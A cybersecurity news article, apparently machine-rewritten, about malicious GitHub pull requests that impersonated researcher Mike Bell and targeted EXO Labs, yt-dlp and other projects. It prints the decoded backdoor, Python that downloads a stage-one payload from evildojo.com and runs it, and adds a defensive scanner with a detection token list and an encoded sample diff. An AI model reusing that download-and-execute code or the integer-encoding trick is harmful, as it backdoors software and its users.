Ethical Hacking News
Malicious GitHub commits have been used to frame researcher Mike Bell, while also infecting other open-source projects like Exo Labs and yt-dlp. Researchers must remain vigilant in their cybersecurity efforts to protect against such threats.
Malicious commits and pull requests targeting GitHub open-source projects have been detected, attempting to inject backdoors. A malicious PR was submitted to EXO Labs' GitHub repository, which attempted to connect to a URL on evildojo.com and download a payload. The commit was made from a deleted GitHub account impersonating Mike Bell, a Texas-based security researcher and software engineer. Multiple projects were targeted by similar malicious commits, including yt-dlp, a popular open-source audio and video downloader. A Google engineer used Presubmit's AI Reviewer to test the PR and flagged it with a "critical security" alert. The incident highlights the importance of vigilance in maintaining cybersecurity standards for open-source projects.
GitHub, a popular platform for open-source projects, has been targeted by malicious commits and pull requests, attempting to inject backdoors into these projects. The most recent incident involved the Exo Labs AI and machine learning startup, which was targeted with a malicious code change submitted under an innocent-looking PR.
On Tuesday, Alex Cheema, co-founder of EXO Labs, warned everyone about the suspicious code change submitted to EXO's GitHub repository. The pull request, titled "clarify mlx requirement for deepseek models", attempted to modify the models.py Python file in Exo's code base by adding a sequence of numbers to it. These numbers, when decoded, represented a piece of code that connected to a URL on a domain called evildojo.com.
This sequence of characters translates into the following code snippet:
import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)
The rather unsophisticated piece of code attempted to connect to evildojo.com and download a "stage1" payload. However, when accessed by BleepingComputer, the link returned a 404 (Not Found), and several others who tried to access the URL found no content ever existed at that location from the beginning.
The commit appears to have been submitted from a GitHub user named "evildojo666," an account that has since been deleted. However, the archived page for the GitHub username points to Mike Bell, a Texas-based security researcher and software engineer who claims someone is impersonating him and making these malicious code submissions to smear him.
Statement from Mike Bell
Bell states, "there was never any payload... why do people keep assuming there was?" In all fairness, Bell's story adds up. Anyone can trivially create a GitHub account using another person's details and profile picture, and begin submitting code changes and pull requests to projects – all under the guise of another person.
Another now-deleted GitHub account "darkimage666" was identified by Malcoreio, a malware analysis and reverse engineering platform. This account also impersonated Bell and appeared to engage in this malicious effort to distribute backdoor commits to open-source projects.
"Not me, an impersonator," remarked Bell at the imposter account.
Multiple projects targeted
Social media users, including ChrzanKong, noted that some other projects had been targeted by different GitHub user accounts with similar commits. According to threat intel analyst vx-underground, "yt-dlp," a popular open-source audio and video downloader, was also targeted. Malcore identified at least 18 instances of identical pull requests directed at other projects.
At the time of writing, BleepingComputer observed that many such malicious commits and the associated "muppet" GitHub user accounts have been taken down.
Google engineer and tech events lead Bogdan Stanga was able to recreate the pull request to test Presubmit's AI Reviewer, which uses GitHub Actions to perform instant code reviews against incoming pull requests to a repository. The test code change was immediately flagged with a "critical security" alert by the reviewer.
[Image: Presubmit's AI reviewer catches similar malicious PRs (BleepingComputer)]
The incident echoes the notable xz supply chain attack that recently demonstrated how malicious code could be snuck into legitimate and widely popular open-source libraries by nefarious actors. Open-source project maintainers are urged to carefully scrutinize incoming pull requests, via automated tools and extensive human code reviews, even if these appear to be originating from "good faith" contributors.
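The pull request described above hid its payload as a list of integers that decode to Python source, and the article recommends automated review of incoming PRs. The following is an added example, not code from the article, BleepingComputer, Presubmit, or any of the projects named: a small diff scanner that looks at the added lines of a unified diff, decodes runs of comma-separated integers as character code points, and reports any run (or any clear-text line) containing tokens such as `os.system` or `urllib.request.urlopen`. The token list, the minimum run length of eight integers, and the sample diff are all assumptions constructed for this example; the integers in the sample encode a harmless placeholder string, not the attacker's payload.

```python
import bisect
import re
from dataclasses import dataclass
from typing import List, Optional

# Tokens whose presence in added code (clear or decoded) warrants a human review.
# This list is an assumption for the example, seeded from the snippet quoted above.
SUSPICIOUS_TOKENS = (
    "urllib.request.urlopen",
    "os.system",
    "subprocess",
    "exec(",
    "eval(",
    "base64",
    "socket",
)

# Eight or more comma-separated small integers in a row: the "sequence of numbers"
# pattern described in the article. Shorter runs (version tuples, shapes) are ignored.
INT_RUN_RE = re.compile(r"(?:\b\d{1,3}\b\s*,\s*){7,}\b\d{1,3}\b")


@dataclass
class Finding:
    line_no: int                   # 1-based line within the diff text
    encoded: bool                  # True if tokens appeared only after decoding integers
    tokens: List[str]              # suspicious tokens matched
    decoded: Optional[str] = None  # decoded text, for encoded findings


def decode_int_run(run: str) -> Optional[str]:
    """Treat a run of integers as character code points and return the text if it
    is overwhelmingly printable; return None for plain numeric data."""
    values = [int(v) for v in re.findall(r"\d+", run)]
    if not values:
        return None
    text = "".join(chr(v) for v in values)
    printable = sum(ch.isprintable() or ch in "\n\r\t" for ch in text)
    return text if printable / len(text) >= 0.95 else None


def added_lines(diff_text: str):
    """Yield (line_no, body) for the '+' lines of a unified diff, skipping '+++' headers."""
    for line_no, line in enumerate(diff_text.splitlines(), 1):
        if line.startswith("+") and not line.startswith("+++"):
            yield line_no, line[1:]


def scan_diff(diff_text: str) -> List[Finding]:
    findings: List[Finding] = []
    parts, offsets, line_nos, pos = [], [], [], 0
    # Pass 1: tokens written in the clear on any added line.
    for line_no, body in added_lines(diff_text):
        hits = [t for t in SUSPICIOUS_TOKENS if t in body]
        if hits:
            findings.append(Finding(line_no, False, hits))
        offsets.append(pos)
        line_nos.append(line_no)
        parts.append(body + "\n")
        pos += len(body) + 1
    # Pass 2: integer runs, which may span several added lines, decoded to text.
    joined = "".join(parts)
    for m in INT_RUN_RE.finditer(joined):
        decoded = decode_int_run(m.group(0))
        if decoded is None:
            continue
        hits = [t for t in SUSPICIOUS_TOKENS if t in decoded]
        if hits:
            line_no = line_nos[bisect.bisect_right(offsets, m.start()) - 1]
            findings.append(Finding(line_no, True, hits, decoded))
    findings.sort(key=lambda f: f.line_no)
    return findings


# Constructed sample diff in the shape the article describes: a models.py change that
# appends a long list of integers. The integers encode the harmless placeholder
# string below; they are not the attacker's payload.
PLACEHOLDER_SOURCE = 'import os\nos.system("echo placeholder")'
ENCODED = ", ".join(str(ord(ch)) for ch in PLACEHOLDER_SOURCE)
SAMPLE_DIFF = (
    "--- a/models.py\n"
    "+++ b/models.py\n"
    "@@ -1,2 +1,4 @@\n"
    " MODELS = {}\n"
    f"+_cfg = [{ENCODED}]\n"
    "+exec(''.join(chr(c) for c in _cfg))\n"
    " def load(name):\n"
)

if __name__ == "__main__":
    for f in scan_diff(SAMPLE_DIFF):
        kind = "encoded" if f.encoded else "clear"
        print(f"line {f.line_no} ({kind}): {f.tokens}")
        if f.decoded:
            print("  decoded:", f.decoded.replace("\n", "\\n"))
```

On the sample diff the scanner reports line 5 (the integer list, decoded, containing `os.system`) and line 6 (`exec(` in the clear). A check like this is a cheap first filter for a CI job, not a replacement for the human review the article calls for: it only catches the specific encoding the article describes and a fixed token list, and a reviewer should still read any flagged hunk.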
In conclusion, this smear campaign against researchers and open-source projects highlights the importance of vigilance in maintaining cybersecurity standards. It emphasizes that any seemingly innocuous changes or updates should be reviewed with extreme caution before they are integrated into the project's codebase.
Related Information:
https://www.bleepingcomputer.com/news/security/github-projects-targeted-with-malicious-commits-to-frame-researcher/
Published: Sat Nov 16 10:33:43 2024 by llama3.2 3B Q4_K_M